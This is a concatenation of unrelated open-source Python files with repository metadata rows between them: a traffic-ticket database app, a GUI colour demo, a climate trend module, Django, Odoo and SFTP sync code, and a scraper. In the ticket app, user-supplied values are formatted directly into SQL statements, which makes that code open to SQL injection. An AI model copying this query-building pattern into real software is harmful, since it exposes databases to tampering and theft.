# Create an interned copy. Take care to only keep a weak
# reference to the object itself.
def object_collected(obj):
kls._internable_stats.incr('collected')
# print("Object %s garbage collected" % obj)
pass
ref = weakref.ref(self, object_collected)
kls._internable_dict[self] = ref
self._interned = True
kls._internable_stats.incr('inserted')
return self
| apache-2.0 | 151,006,402,060,610,500 | 30.650485 | 74 | 0.643865 | false |
ParashRahman/Database-Project | Part1/record_violation.py | 1 | 15513 | from application import Application
from error_checker import ErrorChecker
from errors import InvalidDateException
import add_person
class RecordViolation(Application):
def start_application(self, c):
self.cursor = c
self.list_of_inputs = [ None for i in range(8) ]
self.get_violation_no(0)
self.fields = [ "Violator no.", # 1
"Vehicle id", # 2
"Office no.", # 3
"Violation type", # 4
"Violation date", # 5
"Place", # 6
"Description", # 7
"Insert into database", # 8
"Exit: Cancel entering violation" ] # 9
self.cursor.execute( "SELECT * FROM ticket" )
self.metadata = self.cursor.description
while ( True ):
self.print_field_options( )
choice = self.get_input( len(self.fields) )
if ( choice == 1 ):
self.get_violator_no(choice)
elif ( choice == 2 ):
self.get_vehicle_id(choice)
elif ( choice == 3 ):
self.get_office_no(choice)
elif ( choice == 4 ):
self.get_violation_type(choice)
elif ( choice == 5 ):
self.get_violation_date(choice)
elif ( choice == 6 ):
self.get_violation_place(choice)
elif ( choice == 7 ):
self.get_violation_description(choice)
# Enter data into db option
elif ( choice == 8 ):
inserted = self.insert_into_database()
if ( inserted ):
return
else:
continue
# Exit option
elif ( choice == 9 ):
return
# helper function for printing options
def print_field_options( self, fields = None, showEmpty = True ):
if ( fields == None ):
fields = self.fields
print( "Enter a field option to edit: " )
for i in range( len( fields ) ):
print ( "[{:}] ".format( i+1 ) +
fields[i] +
(" EMPTY" if showEmpty
and i < 7 and not self.list_of_inputs[i+1]
else "") )
# returns the integer input choice
def get_input( self, num_choices,
prompt = "Choose a field to edit or an option: ",
fields = None, showEmpty = True ):
if ( fields == None ):
fields = self.fields
print( prompt )
try:
string_input = input()
choice = int(string_input)
except:
choice = "Invalid"
while ( type( choice ) is not int
or choice >= num_choices + 1
or choice <= 0 ):
self.print_field_options(fields, showEmpty)
print( "Enter a valid integer choice: " )
try:
string_input = input()
choice = int(string_input)
except:
choice = "Invalid"
return choice
###################################
# GENERATE VIOLATION NO.
###################################
def get_violation_no( self, index ):
# gets the list of ids and adds 1 to the max
numbers = self.cursor.execute( "SELECT ticket_no FROM ticket" ).fetchall()
self.list_of_inputs[index] = max([ ID[0] for ID in numbers ]) + 1
###################################
# GET VIOLATOR NO.
###################################
def get_violator_no(self, index):
# initial get and check
user_input = input("Enter the violator's SIN "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
# initial check for if violator exists
exists = False
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the violator's SIN "
"(Enter nothing to cancel): ")
elif ( not exists ):
char_answer = ""
while ( char_answer.strip().lower() not in [ 'y', 'n' ] ):
char_answer = input( "The violator is not in the database. "
"Would you like to add the person? (y/n): " )
if ( char_answer == 'y' ):
a = add_person.AddPerson()
a.start_application(self.cursor)
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
user_input = input("Enter the violator's SIN (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET VEHICLE ID
###################################
def get_vehicle_id(self, index):
# initial get and check
user_input = input("Enter the vehicle serial number "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
# initial check for if violator exists
exists = False
self.cursor.execute("SELECT serial_no FROM vehicle")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the vehicle serial number "
"(Enter nothing to cancel): ")
elif ( not exists ):
user_input = input("The vehicle is not in the database. "
"Enter the violator's SIN (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET OFFICE NO.
###################################
def get_office_no(self, index):
# initial get and check
user_input = input("Enter the office number "
"(Enter nothing to cancel): ")
# initial check if user wants to cancel
if ( len( user_input ) == 0 ):
return
# initial check for if violator exists
exists = False
self.cursor.execute("SELECT SIN FROM people")
rows = self.cursor.fetchall()
rows = [ row[0].strip().lower() for row in rows ]
if ( user_input.strip().lower() in rows ):
exists = True
# While the input string is too long or the violator does not exist
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
while ( not short_enough or not exists):
if ( not short_enough ):
user_input = input("Your input was too long. "
"Enter the office number "
"(Enter nothing to cancel): ")
elif ( not exists ):
user_input = input("The office is not in the database. "
"Enter the office number (Enter "
"nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( user_input.strip().lower() in rows ):
exists = True
else:
exists = False
short_enough = ErrorChecker.check_error(self.metadata[index], user_input)
self.list_of_inputs[index] = "'{:}'".format(user_input.strip().lower())
###################################
# GET VIOLATION TYPE
###################################
def get_violation_type(self, index):
self.cursor.execute( "SELECT * FROM ticket_type" )
list_of_types = self.cursor.fetchall()
prompt_types = [ row[0] + " $" + str(row[1])
for row in list_of_types ]
self.print_field_options( prompt_types, False )
user_input = self.get_input(len( prompt_types ),
"Pick a violation type",
prompt_types, False )
self.list_of_inputs[index] = "'{:}'".format(list_of_types[user_input-1][0])
###################################
# GET VIOLATION DATE
###################################
def get_violation_date(self, index):
while ( True ):
date_input = input ( "Enter the date ( DD/MM/YYYY ) "
"(Enter nothing to cancel): ")
if ( len( date_input ) == 0 ):
return
date_input = date_input.split('/')
try:
if len(date_input) != 3:
raise InvalidDateException()
for component in date_input:
if ( not ErrorChecker.check_str_int(component) ):
raise InvalidDateException()
date_input = [ int(comp) for comp in date_input ]
if (not ErrorChecker.check_error(self.metadata[index], date_input)):
raise InvalidDateException()
break
except ( InvalidDateException ):
print( "Your date was invalid" )
if ( date_input != None ):
d = date_input[0]
m = date_input[1]
y = date_input[2]
self.list_of_inputs[index] = [ "'{:}/{:}/{:}'".format(d,m,y), "'DD/MM/YYYY'" ]
###################################
# GET VIOLATOR PLACE
###################################
def get_violation_place(self, index):
while ( True ):
user_input = input("Enter the place of the violation "
"(Enter nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( ErrorChecker.check_error( self.metadata[index], user_input ) ):
break
else:
print( "Your input was too long" )
self.list_of_inputs[index] = "'{:}'".format(user_input)
###################################
# GET VIOLATOR DESCRIPTION
###################################
def get_violation_description(self, index):
while ( True ):
user_input = input("Enter the description of the violation "
"(Enter nothing to cancel): ")
if ( len( user_input ) == 0 ):
return
if ( ErrorChecker.check_error( self.metadata[index], user_input ) ):
break
else:
print( "Your input was too long" )
self.list_of_inputs[index] = "'{:}'".format(user_input)
###################################
# INSERT INTO DATABASE
###################################
def insert_into_database(self):
# check if fields are empty
unfinished = False
for inp in self.list_of_inputs:
if ( inp == None ):
unfinished = True
if ( unfinished ):
print( "You have left some fields blank." )
char_answer = ""
while ( char_answer.strip().lower() not in [ 'y', 'n' ] ):
char_answer = input( "Would you like to continue saving (y/n)? " )
if ( char_answer == 'n' ):
return False
# change all Nones in input to "NULL"
for i in range( len( self.list_of_inputs ) ):
if ( self.list_of_inputs[i] == None ):
self.list_of_inputs[i] = "NULL"
# prepare date for insertion
if ( self.list_of_inputs[5] != "NULL" ):
self.list_of_inputs[5] = "TO_DATE( {:}, {:} )".format(
self.list_of_inputs[5][0],
self.list_of_inputs[5][1] )
# attempt to charge primary owner if vehicle entered
# and violator is not
if ( self.list_of_inputs[2] != "NULL"
and self.list_of_inputs[1] == "NULL" ):
statement = "SELECT o.owner_id FROM owner o, " \
"vehicle v where v.serial_no = o.vehicle_id " \
"and o.is_primary_owner = 'y' and v.serial_no = " + \
self.list_of_inputs[2]
primary_owner = self.cursor.execute( statement ).fetchall()
if ( len( primary_owner ) == 0 ):
# Do nothing
pass
else:
primary_owner = "'{:}'".format( primary_owner[0][0] )
self.list_of_inputs[1] = primary_owner
statement = "INSERT INTO ticket VALUES( " \
"{:}, {:}, {:}, {:}, {:}, {:}, {:}, {:} )".format(
self.list_of_inputs[0],
self.list_of_inputs[1],
self.list_of_inputs[2],
self.list_of_inputs[3],
self.list_of_inputs[4],
self.list_of_inputs[5],
self.list_of_inputs[6],
self.list_of_inputs[7] )
self.cursor.execute( statement )
return True
def change_owner(self,owner_sin,vehicle_id,is_primary_owner):
statement="delete from owner where vehicle_id='{}'".format(str(vehicle_id))
self.cursor.execute(statement)
value_statement='('+"'"+str(owner_sin)+"'"+','+"'"+str(vehicle_id)+"'"+','+"'"+str(is_primary_owner)+"'"+')'
statement2="insert into owner values"+value_statement
try:
self.cursor.execute(statement2)
except Exception as e:
print("Error! cannot add an owner record")
return
| apache-2.0 | 8,663,207,515,949,221,000 | 37.20936 | 116 | 0.460517 | false |
fifengine/fifengine-demos | pychan_demo/colortester.py | 1 | 7852 | # -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
""" pychan demo app for testing rgba colors on widgets """
from builtins import str
from pychan_demo import PyChanExample
from fife.extensions import pychan
class ColorExample(PyChanExample):
""" a small app (^^) to show how fifechan uses colors on various widgets
"""
def __init__(self):
super(ColorExample,self).__init__('gui/colortester.xml')
def start(self):
"""
load XML file and setup callbacks
"""
self.widget = pychan.loadXML(self.xmlFile)
self.widget.mapEvents({
'base_rslider': self.update_basecolor,
'base_gslider': self.update_basecolor,
'base_bslider': self.update_basecolor,
'base_aslider': self.update_basecolor,
'background_rslider': self.update_background_color,
'background_gslider': self.update_background_color,
'background_bslider': self.update_background_color,
'background_aslider': self.update_background_color,
'foreground_rslider': self.update_foreground_color,
'foreground_gslider': self.update_foreground_color,
'foreground_bslider': self.update_foreground_color,
'foreground_aslider': self.update_foreground_color,
'selection_rslider': self.update_selection_color,
'selection_gslider': self.update_selection_color,
'selection_bslider': self.update_selection_color,
'selection_aslider': self.update_selection_color,
'closeButton':self.stop,
})
# alpha value needs to be set, otherwise you don't see colors ;-)
self.widget.findChild(name="base_aslider").value = float(255)
self.widget.findChild(name="background_aslider").value = float(255)
self.widget.findChild(name="foreground_aslider").value = float(255)
self.widget.findChild(name="selection_aslider").value = float(255)
# init stuff
self.update_basecolor()
self.update_background_color()
self.update_foreground_color()
self.update_selection_color()
self.widget.show()
def update_basecolor(self):
"""
Update rgba base colors of all examples and show the values
"""
r = int(self.widget.findChild(name="base_rslider").value)
g = int(self.widget.findChild(name="base_gslider").value)
b = int(self.widget.findChild(name="base_bslider").value)
a = int(self.widget.findChild(name="base_aslider").value)
# update slider labels
self.widget.findChild(name="base_rvalue").text = str(r)
self.widget.findChild(name="base_gvalue").text = str(g)
self.widget.findChild(name="base_bvalue").text = str(b)
self.widget.findChild(name="base_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").base_color = rgba
self.widget.findChild(name="example2").base_color = rgba
self.widget.findChild(name="example3").base_color = rgba
self.widget.findChild(name="example4").base_color = rgba
self.widget.findChild(name="example5").base_color = rgba
self.widget.findChild(name="example6").base_color = rgba
self.widget.findChild(name="example7").base_color = rgba
self.widget.findChild(name="example8").base_color = rgba
self.widget.findChild(name="example9").base_color = rgba
def update_background_color(self):
"""
Update rgba background colors of all examples and show the values
"""
r = int(self.widget.findChild(name="background_rslider").value)
g = int(self.widget.findChild(name="background_gslider").value)
b = int(self.widget.findChild(name="background_bslider").value)
a = int(self.widget.findChild(name="background_aslider").value)
# update slider labels
self.widget.findChild(name="background_rvalue").text = str(r)
self.widget.findChild(name="background_gvalue").text = str(g)
self.widget.findChild(name="background_bvalue").text = str(b)
self.widget.findChild(name="background_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").background_color = rgba
self.widget.findChild(name="example2").background_color = rgba
self.widget.findChild(name="example3").background_color = rgba
self.widget.findChild(name="example4").background_color = rgba
self.widget.findChild(name="example5").background_color = rgba
self.widget.findChild(name="example6").background_color = rgba
self.widget.findChild(name="example7").background_color = rgba
self.widget.findChild(name="example8").background_color = rgba
self.widget.findChild(name="example9").background_color = rgba
def update_selection_color(self):
"""
Update rgba selection colors of all examples and show the values
"""
r = int(self.widget.findChild(name="selection_rslider").value)
g = int(self.widget.findChild(name="selection_gslider").value)
b = int(self.widget.findChild(name="selection_bslider").value)
a = int(self.widget.findChild(name="selection_aslider").value)
# update slider labels
self.widget.findChild(name="selection_rvalue").text = str(r)
self.widget.findChild(name="selection_gvalue").text = str(g)
self.widget.findChild(name="selection_bvalue").text = str(b)
self.widget.findChild(name="selection_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").selection_color = rgba
self.widget.findChild(name="example2").selection_color = rgba
self.widget.findChild(name="example3").selection_color = rgba
self.widget.findChild(name="example4").selection_color = rgba
self.widget.findChild(name="example5").selection_color = rgba
self.widget.findChild(name="example6").selection_color = rgba
self.widget.findChild(name="example7").selection_color = rgba
self.widget.findChild(name="example8").selection_color = rgba
self.widget.findChild(name="example9").selection_color = rgba
def update_foreground_color(self):
"""
Update rgba foreground colors of all examples and show the values
"""
r = int(self.widget.findChild(name="foreground_rslider").value)
g = int(self.widget.findChild(name="foreground_gslider").value)
b = int(self.widget.findChild(name="foreground_bslider").value)
a = int(self.widget.findChild(name="foreground_aslider").value)
# update slider labels
self.widget.findChild(name="foreground_rvalue").text = str(r)
self.widget.findChild(name="foreground_gvalue").text = str(g)
self.widget.findChild(name="foreground_bvalue").text = str(b)
self.widget.findChild(name="foreground_avalue").text = str(a)
rgba = (r, g, b, a)
self.widget.findChild(name="example1").foreground_color = rgba
self.widget.findChild(name="example2").foreground_color = rgba
self.widget.findChild(name="example3").foreground_color = rgba
self.widget.findChild(name="example4").foreground_color = rgba
self.widget.findChild(name="example5").foreground_color = rgba
self.widget.findChild(name="example6").foreground_color = rgba
self.widget.findChild(name="example7").foreground_color = rgba
self.widget.findChild(name="example8").foreground_color = rgba
self.widget.findChild(name="example9").foreground_color = rgba
| lgpl-2.1 | 3,314,907,281,187,378,700 | 41.673913 | 74 | 0.717142 | false |
ceos-seo/data_cube_utilities | data_cube_utilities/trend.py | 1 | 2098 | from functools import partial
from itertools import islice, product
import numpy as np
import xarray as xr
def __where_not_nan(arr: np.ndarray):
"""Finds position of not nan values in an nd-array
Args:
arr (numpy.ndarray): nd-array with nan values
Returns:
data (xr.DataArray): nd-array with indices of finite(not nan) values
"""
return np.where(np.isfinite(arr))
def __flatten_shallow(arr):
"""Flattens first two axes of nd-array
Args:
arr (numpy.ndarray): nd-array with dimensions (n, m)
Returns:
arr (numpy.ndarray): nd-array with dimensions (n*m)
"""
# TODO: Done in a hurry, Find numpy native way of resizing
return arr.reshape(arr.shape[0] * arr.shape[1])
def __linear_fit(da: xr.DataArray):
"""Applies linear regression on a 1-D xr.DataArray.
Args:
da (xr.DataArray): 1-D Data-Array being manipulated.
Returns:
data (xr.DataArray): DataArray with a single element(slope of regression).
"""
xs = np.array(list(range(len(da.time))))
ys = __flatten_shallow(da.values)
not_nan = __where_not_nan(ys)[0].astype(int)
xs = xs[not_nan]
ys = ys[not_nan]
pf = np.polyfit(xs,ys, 1)
return xr.DataArray(pf[0])
def linear(da: xr.DataArray):
"""Reduces xarray along a time component. The reduction yields a slope for each spatial coordinate in the xarray.
Args:
da (xr.DataArray): 3-D Data-Array being manipulated. `latitude` and `longitude` are required dimensions.
Returns:
linear_trend_product (xr.DataArray): 2-D Data-Array
"""
# TODO: Decouple from coordinate system, and allow regression along multiple components.
stacked = da.stack(allpoints = ['latitude',
'longitude'])
trend = stacked.groupby('allpoints').apply(__linear_fit)
unstacked = trend.unstack('allpoints')
return unstacked.rename(dict(allpoints_level_0 = "latitude",
allpoints_level_1 = "longitude")) | apache-2.0 | 7,278,287,998,188,780,000 | 28.56338 | 118 | 0.621544 | false |
pony-revolution/helpothers | helpothers/views.py | 1 | 1239 | from django.contrib.auth import get_user_model
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from .views_mixins import HelpOthersMetaDataMixin
from listings.models import GatheringCenter, Resource
class HomeView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
context['gathering_centers'] = GatheringCenter.objects.filter(published=True)
context['resources'] = Resource.objects.filter(published=True)
return context
class LoginView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'login.html'
def get_context_data(self, **kwargs):
ctx = super(LoginView, self).get_context_data(**kwargs)
ctx['next'] = self.request.GET.get('next')
return ctx
class ProfileView(HelpOthersMetaDataMixin, UpdateView):
context_object_name = 'profile'
template_name = 'accounts/profile.html'
fields = ('user__first_name', 'user__last_name', 'user__email')
def get_object(self, queryset=None):
return self.request.user.profile
| apache-2.0 | -828,806,971,788,788,700 | 34.4 | 85 | 0.727199 | false |
scattering/ipeek | server/pull_push_expman.py | 1 | 6015 | import glob
import os
import sys
sys.path.append('/var/www/')
sys.path.append('/home/bbm/')
import paramiko
import urllib2, ftplib
import time
import StringIO
import json
DEBUG = False
RETRIEVE_METHOD = "ssh" # or "ftp" or "urllib"
MAX_FTP_RETRIES = 5
HOST_PORT = 22
DEFAULT_PATH = "/usr/local/nice/server_data/experiments/manifest/experiment_manifest.backup"
sources = [
{"name": "NSE",
"host_name": "echo.ncnr.nist.gov"},
{"name": "MAGIK",
"host_name": "magik.ncnr.nist.gov"},
{"name": "NG7",
"host_name": "ng7refl.ncnr.nist.gov"},
{"name": "PBR",
"host_name": "pbr.ncnr.nist.gov"},
{"name": "NGBSANS",
"host_name": "ngbsans.ncnr.nist.gov"},
{"name": "NGB30SANS",
"host_name": "ngb30sans.ncnr.nist.gov"},
{"name": "NG7SANS",
"host_name": "ng7sans.ncnr.nist.gov"},
{"name": "PHADES",
"host_name": "cts.ncnr.nist.gov"},
{"name": "VSANS",
"host_name": "vsans.ncnr.nist.gov"},
]
output = {}
output_filelike = {}
#local_path = "/home/bbm/.livedata/DCS/"
dest_host = "webster.ncnr.nist.gov" #hard-coded
dest_port = 22
# I have a different key for pushing to webster.
dest_pkey = paramiko.RSAKey(filename='/home/bbm/.ssh/datapushkey')
dest_username = "bbm"
def retrieve_ftp(source_host, source_port, file_path, output_buffer, username):
ftp = ftplib.FTP(source_host)
ftp.login('anonymous')
live_datapath = os.path.dirname(file_path)
live_dataname = os.path.basename(file_path)
ftp.cwd(live_datapath)
ftp.retrbinary("RETR " + live_dataname, output_buffer.write)
ftp.close()
def retrieve_ssh(source_host, source_port, file_path, output_buffer, username):
source_transport = paramiko.Transport((source_host, source_port))
source_transport.window_size = 2147483647
source_transport.use_compression(True)
source_pkey = paramiko.RSAKey(filename="/home/bbm/.ssh/datapullkey")
source_username = username
source_transport.connect(username=source_username, pkey = source_pkey)
source_sftp = paramiko.SFTPClient.from_transport(source_transport)
if DEBUG:
print("starting read:", name, os.path.basename(file_path))
f = source_sftp.open(file_path)
response = f.read()
f.close()
if DEBUG:
print("ending read:", name, os.path.basename(file_path))
output_buffer.write(response)
if DEBUG:
print("ending stringIO:", name, os.path.basename(file_path))
def retrieve_urllib(source_host, source_port, file_path, output_buffer, username):
req_addr = os.path.join("ftp://" + source_host, live_datapath, live_dataname)
#req = urllib2.Request(req_addr)
response = None
retries = 0
while retries < MAX_FTP_RETRIES:
try:
response = urllib2.urlopen(req_addr)
break
except:
print("failed attempt %d to retrieve %s: trying again" % (retries, req_addr))
retries += 1
if response is None: return
if DEBUG:
print("retrieved %s" % (req_addr))
output_buffer.write(response.read())
retrievers = {
"ssh": retrieve_ssh,
"urllib": retrieve_urllib,
"ftp": retrieve_ftp
}
def strip_header(manifest):
json_start = manifest.find('[')
return manifest[json_start:]
def strip_emails(manifest):
manifest_obj = json.loads(manifest)
for expt in manifest_obj:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
def strip_emails_and_proprietary(manifest):
manifest_obj = json.loads(manifest)
for i, expt in enumerate(manifest_obj):
if expt['value']['value'].get('publish', '') != 'NORMAL':
manifest_obj.pop(i)
else:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
filters = [strip_header, strip_emails_and_proprietary]
for source in sources:
retrieve_method = source.get('retrieve_method', RETRIEVE_METHOD)
name = source['name']
username = source.get('username', 'ncnr')
source_host = source['host_name']
source_port = source.get('host_port', HOST_PORT)
live_datapath = source.get('manifest_path', DEFAULT_PATH)
try:
live_data = StringIO.StringIO()
retriever = retrievers.get(retrieve_method, lambda *args: None)
retriever(source_host, source_port, live_datapath, live_data, username)
live_data.seek(0) # move back to the beginning of file
output.setdefault(name, {})
filename = os.path.basename(live_datapath)
result = live_data.read()
for f in filters:
result = f(result)
output[name][filename] = result
except Exception as e:
if DEBUG:
print "could not connect to %s because of %s\n" % (name,str(e))
# Now initialize the transfer to the destination:
dest_transport = paramiko.Transport((dest_host, dest_port))
dest_transport.connect(username = dest_username, pkey = dest_pkey)
dest_transport.window_size = 2147483647
dest_transport.use_compression(True)
dest_sftp = paramiko.SFTPClient.from_transport(dest_transport)
for name in output:
#name = source['name']
for json_filename in output[name].keys():
# now I push that file outside the firewall to webster:
remote_tmp = os.path.join('ipeek_html', 'data', name, json_filename + ".tmp")
remotedir = os.path.join('ipeek_html', 'data', name)
remotepath = os.path.join('ipeek_html', 'data', name, json_filename)
if DEBUG:
print "starting write:", name, json_filename
f = dest_sftp.open(remote_tmp, 'w')
f.write(output[name][json_filename])
f.close()
if json_filename in dest_sftp.listdir(remotedir):
dest_sftp.unlink(remotepath)
dest_sftp.rename(remote_tmp, remotepath)
if DEBUG:
print "ending write:", name, json_filename
dest_sftp.close()
dest_transport.close()
#print 'Upload done.'
| unlicense | 4,076,488,242,616,512,000 | 33.371429 | 92 | 0.635411 | false |
jrichte43/ProjectEuler | Problem-0121/solutions.py | 1 | 1722 |
__problem_title__ = "Disc game prize fund"
__problem_url___ = "https://projecteuler.net/problem=121"
__problem_description__ = "A bag contains one red disc and one blue disc. In a game of chance a " \
"player takes a disc at random and its colour is noted. After each " \
"turn the disc is returned to the bag, an extra red disc is added, and " \
"another disc is taken at random. The player pays £1 to play and wins " \
"if they have taken more blue discs than red discs at the end of the " \
"game. If the game is played for four turns, the probability of a " \
"player winning is exactly 11/120, and so the maximum prize fund the " \
"banker should allocate for winning in this game would be £10 before " \
"they would expect to incur a loss. Note that any payout will be a " \
"whole number of pounds and also includes the original £1 paid to play " \
"the game, so in the example given the player actually wins £9. Find " \
"the maximum prize fund that should be allocated to a single game in " \
"which fifteen turns are played."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
| gpl-3.0 | 5,942,483,616,002,205,000 | 45.432432 | 100 | 0.5617 | false |
gurneyalex/odoo | addons/mass_mailing/models/mailing_contact.py | 5 | 5454 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.osv import expression
class MassMailingContactListRel(models.Model):
""" Intermediate model between mass mailing list and mass mailing contact
Indicates if a contact is opted out for a particular list
"""
_name = 'mailing.contact.subscription'
_description = 'Mass Mailing Subscription Information'
_table = 'mailing_contact_list_rel'
_rec_name = 'contact_id'
contact_id = fields.Many2one('mailing.contact', string='Contact', ondelete='cascade', required=True)
list_id = fields.Many2one('mailing.list', string='Mailing List', ondelete='cascade', required=True)
opt_out = fields.Boolean(string='Opt Out',
help='The contact has chosen not to receive mails anymore from this list', default=False)
unsubscription_date = fields.Datetime(string='Unsubscription Date')
message_bounce = fields.Integer(related='contact_id.message_bounce', store=False, readonly=False)
is_blacklisted = fields.Boolean(related='contact_id.is_blacklisted', store=False, readonly=False)
_sql_constraints = [
('unique_contact_list', 'unique (contact_id, list_id)',
'A contact cannot be subscribed multiple times to the same list!')
]
@api.model
def create(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).create(vals)
def write(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).write(vals)
class MassMailingContact(models.Model):
"""Model of a contact. This model is different from the partner model
because it holds only some basic information: name, email. The purpose is to
be able to deal with large contact list to email without bloating the partner
base."""
_name = 'mailing.contact'
_inherit = ['mail.thread.blacklist']
_description = 'Mailing Contact'
_order = 'email'
name = fields.Char()
company_name = fields.Char(string='Company Name')
title_id = fields.Many2one('res.partner.title', string='Title')
email = fields.Char('Email')
list_ids = fields.Many2many(
'mailing.list', 'mailing_contact_list_rel',
'contact_id', 'list_id', string='Mailing Lists')
subscription_list_ids = fields.One2many('mailing.contact.subscription', 'contact_id', string='Subscription Information')
country_id = fields.Many2one('res.country', string='Country')
tag_ids = fields.Many2many('res.partner.category', string='Tags')
opt_out = fields.Boolean('Opt Out', compute='_compute_opt_out', search='_search_opt_out',
help='Opt out flag for a specific mailing list.'
'This field should not be used in a view without a unique and active mailing list context.')
@api.model
def _search_opt_out(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
contacts = self.env['mailing.contact.subscription'].search([('list_id', '=', active_list_id)])
return [('id', 'in', [record.contact_id.id for record in contacts if record.opt_out == value])]
else:
return expression.FALSE_DOMAIN if value else expression.TRUE_DOMAIN
@api.depends('subscription_list_ids')
def _compute_opt_out(self):
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
for record in self:
active_subscription_list = record.subscription_list_ids.filtered(lambda l: l.list_id.id == active_list_id)
record.opt_out = active_subscription_list.opt_out
else:
for record in self:
record.opt_out = False
def get_name_email(self, name):
name, email = self.env['res.partner']._parse_partner_name(name)
if name and not email:
email = name
if email and not name:
name = email
return name, email
@api.model
def name_create(self, name):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email})
return contact.name_get()[0]
@api.model
def add_to_list(self, name, list_id):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email, 'list_ids': [(4, list_id)]})
return contact.name_get()[0]
def _message_get_default_recipients(self):
return {r.id: {
'partner_ids': [],
'email_to': r.email_normalized,
'email_cc': False}
for r in self
}
| agpl-3.0 | 5,388,405,574,171,539,000 | 44.831933 | 160 | 0.632013 | false |
dannywxh/mypy | spider/avso.py | 1 | 5739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, re, time, sys
from bs4 import BeautifulSoup
import common
import requests
reload(sys)
#print sys.getdefaultencoding()
sys.setdefaultencoding('utf-8')
print sys.getdefaultencoding()
def download_html(url):
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, compress',
'Accept-Language': 'en-us;q=0.5,en;q=0.3',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
print "download from "+url+"\n"
response = requests.get(url=url,headers=headers,timeout=5) # 最基本的GET请求
#print "status_code",response.status_code
if response.ok:
#print response.content.encode("gbk")
#return StringIO.StringIO(response.content)
data=response.content
return data
#####以下处理 avso ,可以封装成一个类 #################
def get_cast_onepage_by_avso(cast_name,pagecount=1):
url=r'https://avso.pw/cn/search/'+cast_name+'/page/'+str(pagecount)
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"html.parser")
ret=[]
try:
notfound=soup.find('div',clasas_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
divs=soup.find_all('div',class_="item")
if divs==None:
print "divs is None!"
return
for div in divs:
info=div.find('div',class_="photo-info")
name=div.find('span')
#print name.text
datas=info.find_all('date')
ret.append((name.text,datas[0].text,datas[1].text))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
